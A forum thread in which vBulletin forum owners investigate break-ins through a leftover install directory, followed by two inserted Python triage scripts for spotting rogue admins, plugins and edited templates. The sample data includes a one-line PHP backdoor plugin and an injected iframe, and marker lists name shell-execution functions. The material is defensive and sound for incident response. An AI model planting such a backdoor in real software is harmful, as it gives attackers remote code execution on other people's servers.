A new type hack method?

  • #31
    My ajax_start plugin seems to be failing. The code in it looks suspect, but it could be normal.

    There is a file called fuhosin.php in my /forum/ directory that is signed by a hacker. I deleted it. Not sure if a different version of that should be there or not.



    • #32
      Originally posted by KryptonSite:
      I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.

      I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?

      This exact thing happened to our forum today, as well. We've deleted the install directory and his account and are now trying to figure out what, if anything, he may have done to our system.



      • #33
        Originally posted by runawayjim:
        My ajax_start plugin seems to be failing. The code in it looks suspect, but it could be normal.

        There is a file called fuhosin.php in my /forum/ directory that is signed by a hacker. I deleted it. Not sure if a different version of that should be there or not.

        I did a quick search for fuhosin.php and came up with this.
        http://www.hardened-php.net/suhosin/

        May not be relevant but there you go...




        • #34
          Originally posted by ToddG:
          This exact thing happened to our forum today, as well. We've deleted the install directory and his account and are now trying to figure out what, if anything, he may have done to our system.

          The person that added themselves to my forum deleted themselves afterwards. Go to admincp > Statistics & Logs > Control Panel Log.

          Show entries by:
          the blank space at the top (if they deleted themselves)
          or select their name if they're still there.

          I got:

          Code:
          102106 N/A 18:13, 30th Aug 2013 user.php kill user id = 333162 198.203.28.247
          102105 N/A 18:13, 30th Aug 2013 user.php remove user id = 333162 198.203.28.247
          102104 N/A 18:13, 30th Aug 2013 user.php edit user id = 333162 198.203.28.247
          102103 N/A 18:13, 30th Aug 2013 user.php find 198.203.28.247
          102102 N/A 18:13, 30th Aug 2013 user.php modify 198.203.28.247
          102101 N/A 18:13, 30th Aug 2013 plugin.php 198.203.28.247
          102100 N/A 18:13, 30th Aug 2013 plugin.php kill plugin id = 8305 198.203.28.247
          102099 N/A 18:13, 30th Aug 2013 plugin.php delete plugin id = 8305 198.203.28.247
          102098 N/A 18:13, 30th Aug 2013 plugin.php modify 198.203.28.247
          102097 N/A 18:05, 30th Aug 2013 plugin.php 198.203.28.247
          102096 N/A 18:05, 30th Aug 2013 plugin.php doimport 198.203.28.247
          102095 N/A 18:04, 30th Aug 2013 plugin.php files 198.203.28.247

          From the looks of it they created a plugin, then deleted it, then created a user and deleted that. I can't find any modified files on my server and I don't have the plugins that other people have. The question is why give themselves access and take it away? I've looked through everything and can't find anything out of place.

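The log pattern in post #34 is worth checking mechanically across every admin and source IP rather than by eye, especially on a busy board where the attacker's dozen rows sit among hundreds of legitimate ones. The script below is an added example, not code from the thread or from vBulletin. It parses lines in the format the post shows (the format is assumed from the twelve quoted rows: log id, acting username or N/A, time and date, script, optional action and detail, source IP), groups them by IP and flags the three signs visible there: actions attributed to N/A because the acting account has since been deleted, a plugin imported and removed shortly afterwards, and a user edited and then killed. The sample input is the log quoted in the post.

```python
"""Triage helper for a vBulletin Admin CP Control Panel Log export (added example).

Line format assumed from the post above:
  <logid> <username|N/A> <HH:MM, Dth Mon YYYY> <script> [action [detail]] <ip>
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Sample input: the twelve rows quoted in post #34 (copied from the thread).
SAMPLE_LOG = """\
102106 N/A 18:13, 30th Aug 2013 user.php kill user id = 333162 198.203.28.247
102105 N/A 18:13, 30th Aug 2013 user.php remove user id = 333162 198.203.28.247
102104 N/A 18:13, 30th Aug 2013 user.php edit user id = 333162 198.203.28.247
102103 N/A 18:13, 30th Aug 2013 user.php find 198.203.28.247
102102 N/A 18:13, 30th Aug 2013 user.php modify 198.203.28.247
102101 N/A 18:13, 30th Aug 2013 plugin.php 198.203.28.247
102100 N/A 18:13, 30th Aug 2013 plugin.php kill plugin id = 8305 198.203.28.247
102099 N/A 18:13, 30th Aug 2013 plugin.php delete plugin id = 8305 198.203.28.247
102098 N/A 18:13, 30th Aug 2013 plugin.php modify 198.203.28.247
102097 N/A 18:05, 30th Aug 2013 plugin.php 198.203.28.247
102096 N/A 18:05, 30th Aug 2013 plugin.php doimport 198.203.28.247
102095 N/A 18:04, 30th Aug 2013 plugin.php files 198.203.28.247
"""

LINE_RE = re.compile(
    r"^(?P<logid>\d+)\s+(?P<user>\S+)\s+"
    r"(?P<time>\d{1,2}:\d{2}),\s+(?P<date>\d{1,2})(?:st|nd|rd|th)\s+"
    r"(?P<mon>[A-Za-z]{3})\s+(?P<year>\d{4})\s+"
    r"(?P<script>\S+\.php)(?:\s+(?P<action>\S+))?(?P<extra>.*?)\s+"
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$"
)
ID_RE = re.compile(r"id\s*=\s*(\d+)")


def parse_log(text):
    """Parse exported rows into dicts, oldest first; fail loudly on unknown lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparsed control-panel log line: {line!r}")
        when = datetime.strptime(
            f"{m['date']} {m['mon']} {m['year']} {m['time']}", "%d %b %Y %H:%M")
        entries.append({"logid": int(m["logid"]), "user": m["user"], "when": when,
                        "script": m["script"], "action": m["action"] or "",
                        "extra": m["extra"].strip(), "ip": m["ip"]})
    entries.sort(key=lambda e: e["logid"])  # the Admin CP lists newest first
    return entries


def object_id(entry):
    """Numeric id from a detail field such as 'plugin id = 8305', else None."""
    m = ID_RE.search(entry["extra"])
    return int(m.group(1)) if m else None


def triage(entries, window=timedelta(minutes=30)):
    """Return (rule, ip, detail) findings for the patterns seen in the thread."""
    findings = []
    by_ip = defaultdict(list)
    for e in entries:
        by_ip[e["ip"]].append(e)

    for ip, evs in by_ip.items():
        # Rule 1: N/A as actor means the admin account that did this no longer
        # exists; an attacker who deletes their own account leaves this trace.
        missing = sum(e["user"] == "N/A" for e in evs)
        if missing:
            findings.append(("actor-account-missing", ip,
                             f"{missing} actions by a deleted account"))

        # Rule 2: plugin imported, then deleted/killed from the same IP within
        # `window`. Plugin rows are PHP that vBulletin executes at a hook, so
        # this means arbitrary code already ran, whatever was cleaned up after.
        imports = [e for e in evs if e["script"] == "plugin.php" and e["action"] == "doimport"]
        removals = [e for e in evs if e["script"] == "plugin.php"
                    and e["action"] in ("delete", "kill")]
        for imp in imports:
            for rem in removals:
                if timedelta(0) <= rem["when"] - imp["when"] <= window:
                    findings.append(("plugin-import-then-delete", ip,
                                     f"plugin id {object_id(rem)} imported "
                                     f"{imp['when']:%H:%M}, removed {rem['when']:%H:%M}"))
                    break

        # Rule 3: user edited and then killed by the same IP; keep the id so the
        # row can be looked up in a pre-incident backup.
        killed = {object_id(e) for e in evs if e["script"] == "user.php" and e["action"] == "kill"}
        edited = {object_id(e) for e in evs if e["script"] == "user.php" and e["action"] == "edit"}
        for uid in sorted(killed & edited):
            findings.append(("user-edited-then-killed", ip, f"user id {uid}"))
    return findings


if __name__ == "__main__":
    for rule, ip, detail in triage(parse_log(SAMPLE_LOG)):
        print(f"{rule:28s} {ip:16s} {detail}")
```

To run it on your own board, copy the rows off the Control Panel Log page into a text file and pass its contents to parse_log(); widen `window` if the attacker was slower. Rule 2 is the one that should end the "nothing seems out of place" line of thinking: deleting the plugin row removes the code from the database but not whatever that code wrote to disk or to other tables while it ran.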


            • #35
              Originally posted by kiss of death:
              From the looks of it they created a plugin, then deleted it, then created a user and deleted that. I can't find any modified files on my server and I don't have the plugins that other people have. The question is why give themselves access and take it away? I've looked through everything and can't find anything out of place.

              While I still had my forum running, someone suggested running an admincp tool that checks for unknown or unrecognized files. My system found several (and I have not modded much at all from the original install).

              What I found odd was the SQL injections: they tried to inject all kinds of tags and code for various video sites directly into the SQL database. They were not trying to add posts or anything, just doing straight SQL injections. Not sure there would be any way to check the SQL file and see what has been changed in the last 4 days or not. If not, I am just pulling the forums completely so they can not compromise anything else on my server.



            • #36
              Originally posted by kiss of death:
              From the looks of it they created a plugin, then deleted it, then created a user and deleted that. I can't find any modified files on my server and I don't have the plugins that other people have. The question is why give themselves access and take it away?

              From that, my assumption is that they came in, stuck something into your database using the plug-in thing, then erased the plug-in thing to try and cover up what it was they did. Don't want to make you paranoid, but what if they put something into your database that will or can be triggered by time or some other device? Or maybe I am the one that is paranoid?

              The post above also supports my paranoid theory...




              • #37
                This happened to my forum as well. I misread the announcement (I thought 4.1+ didn't include 4.2.0) and didn't remove the install directory.

                I couldn't find any other changes though, except the new admin account "Th3H4ck", maybe because I noticed the unusual username in time, or because of the password-protected admincp/modcp directory.

                A really scary moment.



                • #38
                  Originally posted by DemOnstar:
                  From that, my assumption is that they came in, stuck something into your database using the plug-in thing, then erased the plug-in thing to try and cover up what it was they did. Don't want to make you paranoid, but what if they put something into your database that will or can be triggered by time or some other device? Or maybe I am the one that is paranoid?

                  The post above also supports my paranoid theory...

                  I think you're right. I do a daily backup, so I can see this happened on the 30th; I'll just restore the backup for the 29th to be on the safe side.



                  • #39
                    Originally posted by kiss of death:
                    I think you're right. I do a daily backup, so I can see this happened on the 30th; I'll just restore the backup for the 29th to be on the safe side.

                    Best to be on the safe side.
                    After looking up the IP, I see it is in China... http://ip-lookup.net/index.php

                    Oddly enough, that is where I reside...

                    Thanks for your input, this is a learning curve for me too...




                    • #40
                      Originally posted by hurricane_sh:
                      This happened to my forum as well. I misread the announcement (I thought 4.1+ didn't include 4.2.0) and didn't remove the install directory.

                      I couldn't find any other changes though, except the new admin account "Th3H4ck", maybe because I noticed the unusual username in time, or because of the password-protected admincp/modcp directory.

                      A really scary moment.

                      Have you checked admincp > Statistics & Logs > Control Panel Log? As above?




                      • #41
                        I'm still wondering how they managed to change people's index pages just from creating an admin account, which means they got FTP access or cPanel access, which isn't available just for having an admin account?

                        I see the original poster of this thread had vBSEO installed. Just out of interest, can you go to AdminCP > Settings > Options > vBSEO Search Engine XML Sitemap,

                        scroll down to "vBSEO Sitemap Interface Access Password" and tell me if the password you used there is the same as your cPanel or FTP account?

                        This is the only way I can currently think of that they might have gained higher access, because the password is not encrypted there and any admin can view it, and as we've seen before, people continue to use the same passwords for everything, which is how they get caught out.



                        • #42
                          Originally posted by kiss of death:
                          scroll down to "vBSEO Sitemap Interface Access Password" and tell me if the password you used there is the same as your cPanel or FTP account?

                          You may have something there?
                          Have to wait and see the results.




                          • #43
                            Originally posted by kiss of death:
                            I'm still wondering how they managed to change people's index pages just from creating an admin account, which means they got FTP access or cPanel access, which isn't available just for having an admin account?

                            I see the original poster of this thread had vBSEO installed. Just out of interest, can you go to AdminCP > Settings > Options > vBSEO Search Engine XML Sitemap,

                            scroll down to "vBSEO Sitemap Interface Access Password" and tell me if the password you used there is the same as your cPanel or FTP account?

                            This is the only way I can currently think of that they might have gained higher access, because the password is not encrypted there and any admin can view it, and as we've seen before, people continue to use the same passwords for everything, which is how they get caught out.

                            Are you pointing this question to me? If so, I can say that it's not about vBSEO. At first, I was suspecting plugins (especially vBSEO) too, but I am convinced that it is not about plugins.

                            And no, I never use the same passwords.

                            You can easily change people's index pages via the style manager if you have an admin account, btw.



                            • DemOnstar commented:
                              Then I guess that one is ruled out...

                            • Reignman commented:
                              Yes, also if you search in search engines for hacked pages, you can see some of them have vBSEO and some of them not.

                          • #44
                            Originally posted by Reignman:
                            You can easily change people's index pages via the style manager if you have an admin account, btw.

                            Yeah, but a few comments I read said that people had had their index.php and forum.php files switched, and they just put the originals back and everything was fine.

                            Also, it wasn't vBSEO itself I was suspecting, it was the vBSEO sitemap generator, which people can use without vBSEO. Before vB4, vBulletin had no built-in sitemap generator and everyone was using the vBSEO one because it was free; when vB4 came out a lot of people continued to use it, and I don't believe there is a problem with it, only the fact that some people use the same passwords and it's clearly shown in a normal field in admincp.

                            Yours was obviously done via the style manager or it wouldn't still say vBSEO at the bottom of the page; I was just curious.

                            I'm just really confused as to why someone with that level of access would try and cover their tracks by removing the plugin and user account but not prune the logs?



                            • #45
                              Originally posted by Reignman:
                              I've searched in templates and I saw that he changed the "FORUMHOME" script. I reverted it and everything turned back to normal.

                              Same happened to me. Deleted the "install" folder, found two admin accounts (deleted them), found three plugin entries (deleted them), and also found entries in one of the database tables.

                              That FORUMHOME entry in the database, how do I fix it? Copying vB files via FTP will not help.

                              Thanks

                              P.S.
                              Well, I just saw a REVERT button...

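Post #35 asked whether there is any way to see what changed in the database in the last few days, and this post lists what it turned out to be: extra admin accounts, plugin rows, and an edited FORUMHOME template. Here is an added example of running that triage as queries. It is not code from the thread or from vBulletin. The schema is a simplified subset modelled on vBulletin 4's user, administrator, template and plugin tables and is an assumption; verify the column names against your own dump before pointing the queries at it. The rows are constructed to mirror the thread (the "Th3H4ck" account, a FORUMHOME template saved by it, and a plugin row carrying a backdoor). Timestamps such as joindate and dateline are written by the application, so anyone with database write access could backdate them; that is why the template and plugin checks also look at content, not only at dates. The content markers are heuristic and will also match some legitimate third-party plugins, so treat hits as a list to read, not to delete blindly.

```python
"""Post-compromise triage queries for a vBulletin database (added example).

Schema is a simplified subset modelled on vBulletin 4's user, administrator,
template and plugin tables: an assumption, so check column names against your
own dump before running the queries there.  Rows are constructed sample data.
"""
import sqlite3

NOW = 1377907200          # constructed "now": 2013-08-31 00:00 UTC
CUTOFF_DAYS = 4           # post #35 asked about "the last 4 days"
DAY = 86400

SCHEMA = """
CREATE TABLE user (userid INTEGER PRIMARY KEY, username TEXT, usergroupid INTEGER,
                   email TEXT, joindate INTEGER, ipaddress TEXT);
CREATE TABLE administrator (userid INTEGER PRIMARY KEY, adminpermissions INTEGER);
CREATE TABLE template (templateid INTEGER PRIMARY KEY, styleid INTEGER, title TEXT,
                       template TEXT, dateline INTEGER, username TEXT);
CREATE TABLE plugin (pluginid INTEGER PRIMARY KEY, title TEXT, hookname TEXT,
                     phpcode TEXT, product TEXT, active INTEGER);
"""

ROWS = {  # constructed sample rows mirroring what the thread describes
    "user": [
        (1, "siteowner", 6, "owner@example.invalid", NOW - 400 * DAY, "203.0.113.5"),
        (2, "regular", 2, "member@example.invalid", NOW - 30 * DAY, "203.0.113.9"),
        (333162, "Th3H4ck", 6, "a@a.a", NOW - 1 * DAY, ""),
    ],
    "administrator": [(1, 3), (333162, 3)],
    "template": [
        (10, 1, "FORUMHOME", '<html><iframe src="http://evil.invalid/"></iframe></html>',
         NOW - 1 * DAY, "Th3H4ck"),
        (11, 1, "header", "<div>stock</div>", NOW - 200 * DAY, "siteowner"),
    ],
    "plugin": [
        (1, "Tag Cloud", "global_start", "$foo = 1;", "vbulletin", 1),
        (8305, "x", "global_start", "eval(base64_decode($_REQUEST['c']));", "vbulletin", 1),
    ],
}

# Heuristic markers: dropped backdoors match, but so can some real plugins.
PLUGIN_MARKERS = ("eval(", "base64_decode(", "$_REQUEST", "$_GET", "$_POST",
                  "system(", "shell_exec(", "passthru(")
TEMPLATE_MARKERS = ("<iframe", "document.write", "unescape(", "fromCharCode")


def load_sample(conn):
    conn.executescript(SCHEMA)
    for table, rows in ROWS.items():
        marks = ",".join("?" * len(rows[0]))
        conn.executemany(f"INSERT INTO {table} VALUES ({marks})", rows)


def recent_admins(conn, since):
    """Accounts in the administrator table or the default Administrators
    usergroup (id 6) whose joindate is on or after `since`."""
    return conn.execute("""
        SELECT u.userid, u.username, u.email, u.ipaddress
        FROM user u LEFT JOIN administrator a ON a.userid = u.userid
        WHERE (a.userid IS NOT NULL OR u.usergroupid = 6) AND u.joindate >= ?
        ORDER BY u.joindate DESC""", (since,)).fetchall()


def recent_template_edits(conn, since):
    """Templates saved on or after `since`, with the username that saved them."""
    return conn.execute("""
        SELECT templateid, styleid, title, username, dateline
        FROM template WHERE dateline >= ? ORDER BY dateline DESC""", (since,)).fetchall()


def content_hits(conn, table, idcol, textcol, markers):
    """Rows whose text column contains any marker, regardless of timestamp."""
    hits = []
    for rowid, title, text in conn.execute(f"SELECT {idcol}, title, {textcol} FROM {table}"):
        found = [m for m in markers if m in text]
        if found:
            hits.append((rowid, title, found))
    return hits


def run_triage(now=NOW, cutoff_days=CUTOFF_DAYS):
    conn = sqlite3.connect(":memory:")
    load_sample(conn)
    since = now - cutoff_days * DAY
    return {
        "admins": recent_admins(conn, since),
        "template_edits": recent_template_edits(conn, since),
        "template_hits": content_hits(conn, "template", "templateid", "template", TEMPLATE_MARKERS),
        "plugin_hits": content_hits(conn, "plugin", "pluginid", "phpcode", PLUGIN_MARKERS),
    }


if __name__ == "__main__":
    for section, rows in run_triage().items():
        print(section)
        for row in rows:
            print("   ", row)
```

The same four queries run unchanged against MySQL once the table prefix and column names are confirmed. Reverting a template from the Admin CP, as this post ends up doing, only fixes the one row; the admin and plugin queries are what tell you whether the rest of the database is clean enough to keep rather than restored from a pre-incident backup.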
